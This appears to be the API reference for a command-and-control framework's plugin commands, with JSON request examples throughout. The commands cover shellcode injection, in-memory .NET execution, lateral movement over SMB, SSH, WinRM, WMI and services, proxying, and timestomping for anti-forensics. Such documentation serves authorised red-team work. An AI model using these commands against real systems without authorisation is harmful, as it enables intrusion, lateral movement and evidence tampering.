Skip to content

Plugin Commands

This section lists plugin-based commands available via the REST API, their parameters, and usage examples.

connect-smb

Purpose: Connect to an SMB agent using a parent agent trigger.

Parameters:

  • host: IP address or domain of the SMB agent.
  • pipename: Name of the SMB pipe.

Example: 

1
2
3
4
5
6
7
{
  "template": "connect-smb",
  "configuration": {
    "host": "smb.example.com",
    "pipename": "mypipe"
  }
}

connect-tcp

Purpose: Establish a connection for a TCP-BIND agent.

Parameters:

  • host: IP address or domain to connect to.
  • port: TCP port number.

Example: 

1
2
3
4
5
6
7
{
  "template": "connect-tcp",
  "configuration": {
    "host": "192.168.1.10",
    "port": 8888
  }
}

cp

Purpose: Copy a file or directory on the target filesystem.

Parameters:

  • source: Source file/directory path.
  • destination: Destination file/directory path.

Example: 

1
2
3
4
5
6
7
{
  "template": "cp",
  "configuration": {
    "source": "C:\\source.txt",
    "destination": "C:\\dest.txt"
  }
}

download

Purpose: Download a file from the agent’s filesystem.

Parameters:

  • filepath: File path to read (supports environment variables).

Example: 

1
2
3
4
5
6
{
  "template": "download",
  "configuration": {
    "filepath": "C:\\path\\to\\file.txt"
  }
}

execute-assembly

Purpose: Execute a .NET assembly in memory.

Parameters:

  • @files.executable: .NET executable file content (base64 encoded if provided via API).
  • parameters: Command line arguments as an array of strings (e.g. ["--audit", "--verbose"]).

Note: Requires a multipart/form-data request if using @files.

Example: 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
--boundary
Content-Disposition: form-data; name="requestBody"
Content-Type: application/json; charset=UTF-8
{
  "template": "execute-assembly",
  "configuration": {
    "parameters": ["--audit"]
  }
}

--boundary
Content-Disposition: form-data; name="executable"; filename="dotnetprog.exe"

__DOTNET_FILE__

inject

Purpose: Inject and execute shellcode.

Parameters:

  • @files.shellcode: Shellcode content.

Example: 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
--boundary
{
  "template": "inject",
  "configuration": {}
}

--boundary
Content-Disposition: form-data; name="shellcode"; filename="shellcode.bin"

__SHELLCODE_FILE__

jump-service

Purpose: Copy a payload and create a Windows service for lateral movement.

Parameters:

  • target: Target machine IP/name (required).
  • payloadId: Service executable payload ID. Required when copyMethod is SMB.
  • copyMethod: Method for copying the payload (SMB, NONE). When omitted, defaults to SMB.
  • copyPath: Destination path for the copied file. Auto-generated if omitted.
  • servicePath: Path for the created service. Defaults to copyPath.
  • serviceName: Service name. Auto-generated if omitted.
  • serviceDisplayName: Display name for the service. Auto-generated if omitted.
  • cleanup: Delete the service after execution (default: true).
  • username: Username for remote authentication (if needed).
  • password: Password for remote authentication (if needed).

Example: 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
{
  "template": "jump-service",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "C:\\new_service.exe",
    "target": "target-machine",
    "servicePath": "C:\\new_service.exe",
    "serviceName": "new-service",
    "serviceDisplayName": "New Service"
  }
}

jump-ssh

Purpose: Execute commands or copy payloads via SSH for lateral movement.

Parameters:

  • payloadId: Executable payload ID. Required when copyMethod is SMB or SCP.
  • copyMethod: Copy method (SCP, SMB, NONE).
  • copyPath: Destination path on the target.
  • target: Target machine IP/name.
  • cmdline: Command line to execute on the target.
  • authMechanism: Authentication mechanism (CLASSIC, NTLM, KERBEROS). Default: CLASSIC. Note: NTLM/KERBEROS cannot be combined with key-based auth.
  • username: Username.
  • password: Password (required with CLASSIC if no privateKeyPEM).
  • @files.privateKeyPEM: Private key PEM file (required with CLASSIC if no password).
  • privateKeyPassword: Password for the private key file.

Example: 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
{
  "template": "jump-ssh",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "C:\\new_agent.exe",
    "target": "target-machine",
    "cmdline": "C:\\new_agent.exe",
    "username": "domain\\user",
    "password": "secret"
  }
}

jump-winrm

Purpose: Execute commands or run an executable via WinRM.

Parameters:

  • payloadId: Executable payload ID.
  • copyMethod: Copy method (SMB, NONE).
  • copyPath: Destination path.
  • target: Target machine IP/name.
  • executablePath: Path of the executable to run.
  • customPowershell: Custom PowerShell script.
  • username: Username (if needed).
  • password: Password (if needed).

Example: 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
{
  "template": "jump-winrm",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "C:\\new_agent.exe",
    "target": "target-machine",
    "executablePath": "C:\\new_agent.exe"
  }
}

jump-wmi

Purpose: Execute commands via WMI for lateral movement.

Parameters:

  • payloadId: Executable payload ID.
  • copyMethod: Copy method (SMB, NONE).
  • copyPath: Destination path.
  • target: Target machine IP/name.
  • cmdline: Command line to execute.
  • username: Username (if needed).
  • password: Password (if needed).

Example: 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
{
  "template": "jump-wmi",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "C:\\new_agent.exe",
    "target": "target-machine",
    "cmdline": "C:\\new_agent.exe"
  }
}

mkdir

Purpose: Create a new directory on the target system.

Parameters:

  • dirpath: Directory path to create (supports recursive creation).

Example: 

1
2
3
4
5
6
{
  "template": "mkdir",
  "configuration": {
    "dirpath": "C:\\new\\directory"
  }
}

mv

Purpose: Move a file or directory on the target system.

Parameters:

  • source: Source file/directory path.
  • destination: Destination path.
  • overwrite: Allow overwriting the destination file (default: true).

Example: 

1
2
3
4
5
6
7
{
  "template": "mv",
  "configuration": {
    "source": "C:\\old.txt",
    "destination": "C:\\new.txt"
  }
}

portscan

Purpose: Perform a TCP port scan and log discovered hosts and ports.

Parameters:

  • ips: IP addresses to scan (values or ranges, separated with commas).
  • ports: Ports to scan (values or ranges, separated with commas).
  • hostDiscovery: Method to use for host discovery: ICMP (default), ARP, or NONE (assumes host exists).
  • hostnameResolving: Method to resolve discovered hostnames: DNS, NETBIOS, ANY, or NONE.
  • timeout: Timeout in milliseconds.
  • threads: Number of concurrent threads for ARP requests.

Example: 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
{
  "template": "portscan",
  "configuration": {
    "ips": "192.168.1.0/24",
    "ports": "1-1024",
    "hostDiscovery": "ICMP",
    "timeout": 1000,
    "threads": 10
  }
}

procinfo

Purpose: Retrieve additional information about the agent’s process.

Parameters: None

Example: 

1
2
3
4
{
  "template": "procinfo",
  "configuration": {}
}

rm

Purpose: Remove a file from the target filesystem.

Parameters:

  • filepath: File path to delete (supports environment variables).

Example: 

1
2
3
4
5
6
{
  "template": "rm",
  "configuration": {
    "filepath": "C:\\path\\to\\file.txt"
  }
}

rmdir

Purpose: Remove a directory from the target filesystem.

Parameters:

  • dirpath: Directory path to delete (supports environment variables).

Example: 

1
2
3
4
5
6
{
  "template": "rmdir",
  "configuration": {
    "dirpath": "C:\\path\\to\\delete"
  }
}

rportfwd

Purpose: Creates reverse port forwarding (traffic is forwarded through C2).

Parameters:

  • bindIp: On what IP/interface to listen on the agent (all interfaces by default).
  • bindPort: On what port to listen on the agent.
  • forwardHost: To what host to redirect traffic (data is sent from Tuoni server).
  • forwardPort: To what port to redirect traffic (data is sent from Tuoni server).

Example: 

1
2
3
4
5
6
7
8
{
  "template": "rportfwd",
  "configuration": {
    "bindPort": 1234,
    "forwardHost": "some.target.host",
    "forwardPort": 443
  }
}

screenshot

Purpose: Capture a screenshot of the target machine.

Parameters: None

Example: 

1
2
3
4
{
  "template": "screenshot",
  "configuration": {}
}

socks5

Purpose: Create a SOCKS5 proxy on the agent’s network.

Parameters:

  • port: Port that C2 opens for the SOCKS5 proxy.

Example: 

1
2
3
4
5
6
{
  "template": "socks5",
  "configuration": {
    "port": 8765
  }
}

spawn

Purpose: Spawn a new agent with provided configuration.

Parameters:

  • payloadId: Listener payload ID.
  • encryptedCommunication: Whether to encrypt communication.

Example: 

1
2
3
4
5
6
7
{
  "template": "spawn",
  "configuration": {
    "payloadId": 1,
    "encryptedCommunication": true
  }
}

upload

Purpose: Upload a file to the target filesystem.

Parameters:

  • filepath: Destination file path (supports environment variables). Optional — when omitted, the uploaded filename is used.
  • @files.file: File content.

Example: 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
--boundary
{
  "template": "upload",
  "configuration": {
    "filepath": "C:\\path\\to\\dest.txt"
  }
}

--boundary
Content-Disposition: form-data; name="file"; filename="somefile.txt"

__UPLOAD_FILE__

upload-payload

Purpose: Write a generated payload to the target filesystem.

Parameters:

  • filepath: Destination file path (supports environment variables).
  • payloadId: ID of the payload to upload.

Example: 

1
2
3
4
5
6
7
{
  "template": "upload-payload",
  "configuration": {
    "filepath": "C:\\path\\to\\agent.exe",
    "payloadId": 11
  }
}

powerpick

Purpose: Execute a PowerShell command or script without spawning powershell.exe. Uses an in-process unmanaged PowerShell runspace.

Parameters:

  • command: PowerShell command or script to execute. Optional — when omitted, an interactive session is opened.

Example: 

1
2
3
4
5
6
{
  "template": "powerpick",
  "configuration": {
    "command": "Get-Process | Select-Object Name, Id"
  }
}

timestomp

Purpose: Modify file timestamps on the target system to aid anti-forensics.

Parameters:

  • target: Path of the file whose timestamps will be modified (required).
  • source: Path of a file to copy timestamps from. When provided, created, written, and accessed are ignored.
  • created: New creation timestamp (e.g. 2020-01-01T00:00:00). Optional.
  • written: New last-write timestamp. Optional.
  • accessed: New last-access timestamp. Optional.

Example: 

1
2
3
4
5
6
7
{
  "template": "timestomp",
  "configuration": {
    "target": "C:\\path\\to\\file.exe",
    "source": "C:\\Windows\\System32\\notepad.exe"
  }
}

remote-exec-ssh

Purpose: Execute a command on a remote host over SSH.

Parameters:

  • target: Target machine IP or hostname (required).
  • command: Command to execute on the remote host (required).
  • authMechanism: Authentication mechanism (CLASSIC, NTLM, KERBEROS). Default: CLASSIC. Note: NTLM/KERBEROS cannot be combined with key-based auth.
  • username: Username for authentication.
  • password: Password (required with CLASSIC if no privateKeyPEM).
  • @files.privateKeyPEM: Private key PEM file (required with CLASSIC if no password).
  • privateKeyPassword: Password for the private key file.

Example: 

1
2
3
4
5
6
7
8
9
{
  "template": "remote-exec-ssh",
  "configuration": {
    "target": "target-machine",
    "command": "id",
    "username": "admin",
    "password": "secret"
  }
}

remote-exec-winrm

Purpose: Execute a PowerShell command on a remote host via WinRM.

Parameters:

  • target: Target machine IP or hostname (required).
  • command: PowerShell command to execute on the remote host (required).
  • username: Username for authentication (if needed).
  • password: Password for authentication (if needed).

Example: 

1
2
3
4
5
6
7
8
9
{
  "template": "remote-exec-winrm",
  "configuration": {
    "target": "target-machine",
    "command": "whoami",
    "username": "domain\\user",
    "password": "secret"
  }
}

remote-exec-wmi

Purpose: Execute a command on a remote host via WMI.

Parameters:

  • target: Target machine IP or hostname (required).
  • command: Command to execute (required).
  • commandType: How the command is run: POWERSHELL, CMD, or CREATE_PROCESS. Default: POWERSHELL.
  • username: Username for authentication (if needed).
  • password: Password for authentication (if needed).
  • hideWindow: Hide the spawned process window (default: true).

Example: 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
{
  "template": "remote-exec-wmi",
  "configuration": {
    "target": "target-machine",
    "command": "whoami",
    "commandType": "CMD",
    "username": "domain\\user",
    "password": "secret"
  }
}

remote-exec-service

Purpose: Execute a command on a remote host by creating a temporary Windows service.

Parameters:

  • target: Target machine IP or hostname (required).
  • command: Command to execute (required).
  • commandType: How the command is run: POWERSHELL, CMD, or CREATE_PROCESS. Default: POWERSHELL.
  • username: Username for authentication (if needed).
  • password: Password for authentication (if needed).

Note: A randomly named Windows service is created, used to run the command, and then deleted automatically.

Example: 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
{
  "template": "remote-exec-service",
  "configuration": {
    "target": "target-machine",
    "command": "whoami > C:\\out.txt",
    "commandType": "CMD",
    "username": "domain\\user",
    "password": "secret"
  }
}

remote-upload-scp

Purpose: Upload a payload or a custom file to a remote host via SCP.

Parameters:

  • target: Target machine IP or hostname (required).
  • path: Destination path on the remote host.
  • payloadId: ID of a generated payload to upload. Mutually exclusive with @files.uploadFile.
  • @files.uploadFile: File to upload. Mutually exclusive with payloadId.
  • authMechanism: Authentication mechanism (CLASSIC, NTLM, KERBEROS). Default: CLASSIC. Note: NTLM/KERBEROS cannot be combined with key-based auth.
  • username: Username for authentication.
  • password: Password (required with CLASSIC if no privateKeyPEM).
  • @files.privateKeyPEM: Private key PEM file (required with CLASSIC if no password).
  • privateKeyPassword: Password for the private key file.

Note: PayloadId or uploadFile - one of them has to be set but not both.

Note (payload upload): Requires only a JSON body.

Example: 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
{
  "template": "remote-upload-scp",
  "configuration": {
    "payloadId": 5,
    "path": "/tmp/agent",
    "target": "target-machine",
    "username": "admin",
    "password": "secret"
  }
}

Note (file upload): Requires a multipart/form-data request.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
--boundary
Content-Disposition: form-data; name="requestBody"
Content-Type: application/json; charset=UTF-8
{
  "template": "remote-upload-scp",
  "configuration": {
    "path": "/tmp/myfile",
    "target": "target-machine",
    "username": "admin",
    "password": "secret"
  }
}

--boundary
Content-Disposition: form-data; name="uploadFile"; filename="myfile.bin"

__UPLOAD_FILE__